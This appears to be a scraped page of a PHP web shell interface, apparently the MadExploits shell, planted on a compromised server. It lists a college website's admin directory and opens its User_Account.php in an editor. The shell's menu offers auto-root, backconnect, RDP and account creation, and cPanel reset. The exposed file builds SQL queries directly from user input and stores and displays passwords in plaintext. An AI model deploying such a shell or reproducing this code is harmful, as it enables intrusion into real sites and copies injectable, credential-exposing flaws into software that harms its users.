Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.148.240.165
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
wwwroot /
jdcpatala.org /
np_admin /
[ HOME SHELL ]
Name
Size
Permission
Action
SpryAssets
[ DIR ]
drwxr-xr-x
ckeditor
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxr-xr-x
Logout.php
84
B
-rw-r--r--
Session_Update.php
2.58
KB
-rw-r--r--
User_Account.php
12.6
KB
-rw-r--r--
User_Profile.php
8.57
KB
-rw-r--r--
User_Profile_permmion.php
14.71
KB
-rw-r--r--
admin_home.php
2
KB
-rw-r--r--
admin_home_old.php
10.92
KB
-rw-r--r--
attand.php
9.14
KB
-rw-r--r--
college_profile.php
8.56
KB
-rw-r--r--
college_profile_edit.php
7.15
KB
-rw-r--r--
committee_member.php
9.53
KB
-rw-r--r--
committee_member_edit.php
7.74
KB
-rw-r--r--
committee_name.php
7.26
KB
-rw-r--r--
connection.php
177
B
-rw-r--r--
courses.php
8.14
KB
-rw-r--r--
courses_edit.php
6.64
KB
-rw-r--r--
databasebackup.php
3.58
KB
-rw-r--r--
databaserestore.php
2.65
KB
-rw-r--r--
error_log
1.36
KB
-rw-r--r--
foragte_password.php
307
B
-rw-r--r--
gallery.php
8.79
KB
-rw-r--r--
gallery_edit.php
6.94
KB
-rw-r--r--
index.php
2.4
KB
-rw-r--r--
login_2.php
18.94
KB
-rw-r--r--
new_notice.php
9.16
KB
-rw-r--r--
non_teaching.php
10.16
KB
-rw-r--r--
non_teaching_edit.php
8.21
KB
-rw-r--r--
principal_message.php
8.96
KB
-rw-r--r--
principal_message_edit.php
7.35
KB
-rw-r--r--
splash_view.php
7.33
KB
-rw-r--r--
teaching.php
10.14
KB
-rw-r--r--
teaching_edit.php
8.2
KB
-rw-r--r--
teching_edit.php
8.17
KB
-rw-r--r--
tender.php
8.69
KB
-rw-r--r--
update_and_delete.php
4.1
KB
-rw-r--r--
update_attand.php
6.89
KB
-rw-r--r--
update_notice.php
6.9
KB
-rw-r--r--
user_details.php
9.24
KB
-rw-r--r--
user_reg.php
4.26
KB
-rw-r--r--
validateuser.php
685
B
-rw-r--r--
view_notice.php
1.14
KB
-rw-r--r--
welcome.php
821
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : User_Account.php
<?php ob_start(); session_start(); error_reporting(4); include("includes/connection.php"); include_once("includes/function.inc.php"); validateUser(); extract($_POST); if($_REQUEST["Submit"]!="") { $QueryUpdate="insert into user set UserName ='".$UserName."', Password ='".$Password."', CPassword ='".$CPassword."' "; mysqli_query($con, $QueryUpdate) or die(mysqli_error()); header("location:index.php"); exit(); } if($_REQUEST["Submitupdate"]=="Update") { extract($_POST); $Rowadminuser="select * from user where UserId ='".$_POST['UserId']."' and Password ='".$OPassword."'"; $Useradmin=mysqli_query($con, $Rowadminuser) or die(mysqli_error()); $RowAdmin=mysqli_fetch_assoc($Useradmin); $message = NULL; if($RowAdmin["Password"]!=$_POST['OPassword']) { $message="The Password you entered does not exist"; } else if($_POST['NPassword']!=$_POST['CPassword']) { $message.= "The new password and confirm new password fields must be the same"; } else { if($_POST['NPassword']!="" && $_POST['CPassword']!="") { $sql=mysqli_query($con, "UPDATE user SET Password='".$NPassword."' where UserId ='".$_POST['UserId']."'"); if($sql) { $message.= "Congratulations You have successfully changed your password"; } } else { $message.= "The new password and confirm new password fields must be fill"; } } } if($_REQUEST["Delete"]=="Delete") { extract($_POST); $Rowadminuser="delete from user where UserId ='".$_POST['UserId']."'"; $Useradmin=mysqli_query($con, $Rowadminuser) or die(mysqli_error()); //$RowAdmin=mysqli_fetch_assoc($Useradmin); } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title><?php echo $title; ?></title> <link href="css/mystyle.css" rel="stylesheet" type="text/css" /> <script src="SpryAssets/SpryTabbedPanels.js" type="text/javascript"></script> <link href="SpryAssets/SpryTabbedPanels.css" rel="stylesheet" type="text/css" /> <script language="javascript"> function Registration() { //alert("ajajak"); if(document.frm.UserName.value=="") { alert("Enter User Name , please!"); document.frm.UserName.focus(); document.frm.UserName.style.backgroundColor='#F9F3C1'; return false; } if (document.frm.Password.value=="") { alert("Enter User Password , please!"); document.frm.Password.focus(); document.frm.Password.style.backgroundColor='#F9F3C1'; return false; } if (document.frm.CPassword.value!=document.frm.Password.value) { alert("Password and confirm password does not match."); document.frm.CPassword.focus(); document.frm.CPassword.style.backgroundColor='#F9F3C1'; return false; } } </script> <script language="javascript"> function User() { //alert("ajajak"); if(document.form1.UserId.selectedIndex == 0) { alert("Select User Name , please!"); document.form1.UserId.focus(); document.form1.UserId.style.backgroundColor='#F9F3C1'; return false; } } </script> <script language="javascript"> function Del() { //alert("ajajak"); if(document.form2.UserId.selectedIndex == 0) { alert("Select User Name , please!"); document.form2.UserId.focus(); document.form2.UserId.style.backgroundColor='#F9F3C1'; return false; } } </script> </head> <body> <div class="outer"> <?php include("includes/header.inc.php"); ?> <div class="page"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td height="400" align="center" valign="middle"><table width="70%" border="0" align="center" cellpadding="0" cellspacing="0" class="table-border"> <tr> <td class="tble-heading" colspan="2">User Account</td> </tr> <tr> <td width="87%"> </td> <td width="13%"> </td> </tr> <tr> <td colspan="2" align="center"> <div id="TabbedPanels1" class="TabbedPanels"> <ul class="TabbedPanelsTabGroup"> <li class="TabbedPanelsTab" tabindex="0">Create User</li> <li class="TabbedPanelsTab" tabindex="0">Modify User</li> <li class="TabbedPanelsTab" tabindex="0">Delete User</li> <li class="TabbedPanelsTab" tabindex="0">Display User</li> </ul> <div class="TabbedPanelsContentGroup"> <div class="TabbedPanelsContent"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td height="25" colspan="2" align="center"><?php if($message!="") { echo $message; } ?></td> </tr> <tr> <td height="350" align="center" valign="middle"><form id="frm" name="frm" method="post" action="" onsubmit="return Registration();"> <table width="70%" border="0" cellspacing="0" cellpadding="4"> <tr> <td width="41%" align="left" valign="top">User Name </td> <td width="59%" align="left" valign="top"> <input name="UserName" type="text" class="txtbox" id="UserName" /> </td> </tr> <tr> <td align="left" valign="top">Password</td> <td align="left" valign="top"> <input name="Password" type="Password" class="txtbox" id="Password" /></td> </tr> <tr> <td align="left" valign="top">Confirm Password </td> <td align="left" valign="top"><input name="CPassword" type="Password" class="txtbox" id="CPassword" /></td> </tr> <tr> <td height="44" align="left" valign="top"> </td> <td align="left" valign="middle"> <input name="Submit" type="submit" class="sbt-btn" value="Submit" /> </td> </tr> </table> </form> </td> </tr> </table> </div> <div class="TabbedPanelsContent"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td height="350" align="center" valign="middle"> <form id="form1" name="form1" method="post" action="" onsubmit="return User();"> <table width="70%" border="0" cellspacing="0" cellpadding="4"> <tr> <td width="41%" align="left" valign="top">User Name </td> <td width="59%" align="left" valign="top"> <?php $QueryReport=mysqli_query($con, "select * from user "); ?> <select name="UserId" class="txtbox" id="UserId"> <option value="">Select User</option> <?php while($RowResult=mysqli_fetch_assoc($QueryReport)) { ?> <option value="<?php echo $RowResult["UserId"];?>"><?php echo $RowResult["UserName"];?></option> <?php } ?> </select> </td> </tr> <tr> <td align="left" valign="top">Old Password </td> <div id="UserName"> <td align="left" valign="top"><input name="OPassword" type="text" class="txtbox" id="OPassword" /></td> </div> </tr> <tr> <td align="left" valign="top">New Password</td> <td align="left" valign="top"><input name="NPassword" type="text" class="txtbox" id="NPassword" /></td> </tr> <tr> <td align="left" valign="top">Confirm Password </td> <td align="left" valign="top"><input name="CPassword" type="text" class="txtbox" id="CPassword" /></td> </tr> <tr> <td height="44" align="left" valign="top"> </td> <td align="left" valign="middle"><input name="Submitupdate" type="submit" class="sbt-btn" value="Update" /> </td> </tr> </table> </form></td> </tr> </table> </div> <div class="TabbedPanelsContent"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td height="350" align="center" valign="middle"><form id="form2" name="form2" method="post" action="" onsubmit="return Del();"> <table width="70%" border="0" cellspacing="0" cellpadding="4"> <tr> <td width="41%" align="left" valign="top">User Name </td> <td width="59%" align="left" valign="top"> <?php $QueryReportDel=mysqli_query($con, "select * from user "); ?> <select name="UserId" class="txtbox" id="UserId"> <option>Select User</option> <?php while($RowResult123=mysqli_fetch_assoc($QueryReportDel)) { ?> <option value="<?php echo $RowResult123["UserId"];?>"><?php echo $RowResult123["UserName"];?></option> <?php } ?> </select> </td> </tr> <!--<tr> <td align="left" valign="top">Password </td> <td align="left" valign="top"><input name="OPassword2" type="text" class="txtbox" id="OPassword2" /></td> </tr>--> <tr> <td height="44" align="left" valign="top"> </td> <td align="left" valign="middle"><input name="Delete" type="submit" class="sbt-btn" value="Delete" /> </td> </tr> </table> </form></td> </tr> </table> </div> <div class="TabbedPanelsContent"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td height="350" align="center" valign="top"> <?php $Showuser=mysqli_query($con, "select * from user order by UserId desc"); ?> <table width="70%" border="0" cellspacing="0" cellpadding="4"> <tr> <td width="6%" align="left" valign="top"> </td> <td width="52%" align="left" valign="top">User Name</td> <td width="42%" align="left" valign="top">Password</td> </tr> <?php while($RowResultshow=mysqli_fetch_assoc($Showuser)) { ?> <tr> <td align="left" valign="top"> </td> <td align="left" valign="top"><?php echo $RowResultshow["UserName"];?></td> <td align="left" valign="top"><?php echo $RowResultshow["Password"]?></td> </tr> <?php } ?> </table> </form></td> </tr> </table> </div> </div> </div></td> </tr> <tr> <td height="50"> </td> <td><div class="exit"><a href="welcome.php">Exit</a></div></td> </tr> </table></td> </tr> </table> </div> <?php include("includes/footer.inc.php"); ?> <script type="text/javascript"> var TabbedPanels1 = new Spry.Widget.TabbedPanels("TabbedPanels1"); </script> </div> </body> </html>
Close